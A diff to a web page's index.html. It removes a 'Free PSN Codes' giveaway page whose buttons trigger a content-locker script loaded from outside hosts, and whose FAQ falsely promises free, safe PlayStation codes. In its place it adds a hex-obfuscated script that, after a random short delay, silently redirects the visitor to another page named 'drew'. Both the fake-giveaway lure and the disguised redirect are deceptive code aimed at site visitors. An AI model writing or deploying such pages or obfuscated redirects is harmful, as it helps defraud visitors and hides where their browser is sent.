--- a/index.html
+++ b/index.html
@@ -1,87 +1,7 @@
 <!DOCTYPE HTML>
 <head>
-	<title>Free PSN Codes - Giveaway</title>
-    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
-	<meta name="viewport" content="width=device-width; initial-scale=0.5; maximum-scale=2.0;" />
-	<meta name="MobileOptimized" content="width" />
-	<meta name="HandheldFriendly" content="true" />
-	<link rel="stylesheet" href="http://vicitpsn.github.io/psn/sx.css" type="text/css" />
-	<link rel="stylesheet" href="http://vicitpsn.github.io/psn/ex.css" type="text/css" />
-	<script type="text/javascript" src="http://vicitpsn.github.io/psn/cev.js"></script>
-	<script type="text/javascript" src="http://vicitpsn.github.io/psn/con.js"></script>
-	<script type="text/javascript" src="http://vicitpsn.github.io/psn/12.js"></script>
-	<script type="text/javascript" src="http://vicitpsn.github.io/psn/rede.js"></script>
-    <script type="text/javascript" src="http://vicitpsn.github.io/psn/bg.js"></script>
-	<script type="text/javascript" src="https://ultrafiles.co/script_include.php?id=402282"></script>
+</head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 </head>
 <body>
-<header id="header">
-	<div id="header-content">
-	<a href="#"><div class="logo"></div></a>
-	</div>
-</header>
-<div class="bg-holder">
-	<div id="content-bg"></div>
-</div>
-<div class='wrapper'>
-	<div id="home-text">
-	<p>Choose PSN Code of any value for free!</p></div>
-	<div id="product-holder">
-    <div id="product-holder1">
-        <div id="proceed">
-        <a href="#"><div class="button" onclick="call_locker();"></div></a>
-        </div>
-    </div>
-    <div id="product-holder2">
-		<div id="proceed">
-        <a href="#"><div class="button" onclick="call_locker();"></div></a>
-        </div>
-    </div>
-
-	<div id="product-holder3">
-   		<div id="proceed">
-        <a href="#"><div class="button" onclick="call_locker();"></div></a>
-        </div>
-    </div>
-    </div>
-
-    
-    <div id="columns-bg">
-    <div class="padding">
-    <h1>Free PSN Codes - FAQ</h1>
-<br/>
-<h2>
-<br/><br/>
-On this website you are given the opportunity to get free PSN codes. We are always delivering fully working codes scanned for our users. Please select which PSN code you want to receive for free and after a while you will easily get it.
-<br/><br/>
-</h2>
-<h1>
-Why do I need PSN Codes and how do I get it for free?
-</h1>
-<br/><br/>
-<h2>
-By having a PSN code you can purchase psn games and other products over the playstation store. You can simply choose the value of your free PSN code by pressing "Select" under the card you want on the top of this page. When you have received your free PSN codes(s), you can simply write them down on a piece of paper and redeem any code in the playstation store.
-<br/><br/>
-</h2>
-<h1>
-Are the free PSN codes safe to use?
-</h1>
-<br/><br/>
-<h2>
-The answer for this question is surely yes! All our free psn codes are scanned and manually checked so that it does not contain any harmful data for the user or the users account. Codes are shown on the screen after completing steps and that means there is no chance you will download viruses or malicious software.
-</h1>
-<br/>
-</div>
-    </div>
-
-    </section>
-
-  </div>
-</div>
-
-<footer>
-	<div class="copyrights">
-	<p><a style="color: #fff;" href="#">© Free PSN Codes 2015</a>.</p></div>
-    </div>
-</footer>
+<script>var _0xcb6d=["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x64\x72\x65\x77","\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74","\x74\x68\x69\x73\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x20\x3D\x20\x75\x3B"];var _0xbecb=[_0xcb6d[0],_0xcb6d[1],_0xcb6d[2],_0xcb6d[3],_0xcb6d[4]];var t=Math[_0xbecb[1]]((Math[_0xbecb[0]]()*100)+1),u=_0xbecb[2],s=self[_0xbecb[3]];s(_0xbecb[4],t);</script>
 </body>
